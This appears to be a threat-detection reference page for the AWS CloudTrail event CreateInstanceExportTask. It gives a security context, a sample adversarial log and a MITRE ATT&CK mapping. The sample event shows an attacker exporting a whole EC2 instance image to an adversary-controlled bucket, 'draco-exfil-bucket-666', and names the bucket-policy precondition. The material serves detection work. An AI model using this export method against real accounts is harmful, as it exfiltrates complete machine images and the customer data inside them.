CreateInstanceExportTask
AWS
CreateInstanceExportTask
Event
Exports an EC2 instance as a virtual machine image to an S3 bucket in a format such as OVF or VMDK.
Security Context
- Accessing cloud storage objects can expose sensitive data including backups, configuration files, application data, and customer information.
- Transferring data to external cloud accounts or regions can bypass network-based data loss prevention controls and exfiltrate large volumes of data.
Log Source
CloudTrail
Sample Event
Adversarial. Draco exports a running OCCAMY pipeline EC2 instance to the adversary-controlled S3 bucket draco-exfil-bucket-666 (in account 555666661337). The export produces an OVA file that contains a complete VMware-importable VM image — root and data disks plus instance metadata. AWS will write the OVA into the destination bucket if the bucket policy explicitly allows the vmie.amazonaws.com service principal. This sample assumes the bucket policy was already set up by the adversary in advance.
{ "eventVersion": "1.09", "userIdentity": { "type": "IAMUser", "principalId": "AIDADRAC0MALF0YBADGY", "arn": "arn:aws:iam::555123456789:user/draco", "accountId": "555123456789", "accessKeyId": "AKIADRAC0MALF0YEXAMP5", "userName": "draco", "sessionContext": { "attributes": { "creationDate": "2026-04-15T18:51:02Z", "mfaAuthenticated": "false" } } }, "eventTime": "2026-04-15T22:55:43Z", "eventSource": "ec2.amazonaws.com", "eventName": "CreateInstanceExportTask", "awsRegion": "us-east-1", "sourceIPAddress": "203.0.113.66", "userAgent": "aws-cli/1.18.147 Python/3.7.10 Linux/5.4.0-1045-aws botocore/1.18.6", "requestParameters": { "description": "Maintenance export", "instanceId": "i-0occamy0000000001", "targetEnvironment": "vmware", "exportToS3": { "diskImageFormat": "VMDK", "containerFormat": "ova", "s3Bucket": "draco-exfil-bucket-666", "s3Prefix": "exports/" } }, "responseElements": { "requestId": "90000000-0000-4000-8000-000010001010", "exportTask": { "exportTaskId": "export-i-0666exfiltask66", "description": "Maintenance export", "state": "active", "statusMessage": "Running", "instanceExport": { "instanceId": "i-0occamy0000000001", "targetEnvironment": "vmware" }, "exportToS3": { "diskImageFormat": "VMDK", "containerFormat": "ova", "s3Bucket": "draco-exfil-bucket-666", "s3Key": "exports/export-i-0666exfiltask66.ova" } } }, "requestID": "90000000-0000-4000-8000-000010001010", "eventID": "90000000-0000-4000-8000-000010001011", "readOnly": false, "eventType": "AwsApiCall", "managementEvent": true, "recipientAccountId": "555123456789", "eventCategory": "Management", "tlsDetails": { "tlsVersion": "TLSv1.3", "cipherSuite": "TLS_AES_128_GCM_SHA256", "clientProvidedHostHeader": "ec2.us-east-1.amazonaws.com" }}MITRE ATT&CK Mapping
Tactics: Exfiltration Collection
Techniques:
- T1537 — Transfer Data to Cloud Account — Adversaries may exfiltrate data by transferring the data, including through sharing/syncing and creating backups of cloud environments, to another cloud account they control on the same service.
- T1530 — Data from Cloud Storage — Adversaries may access data from cloud storage.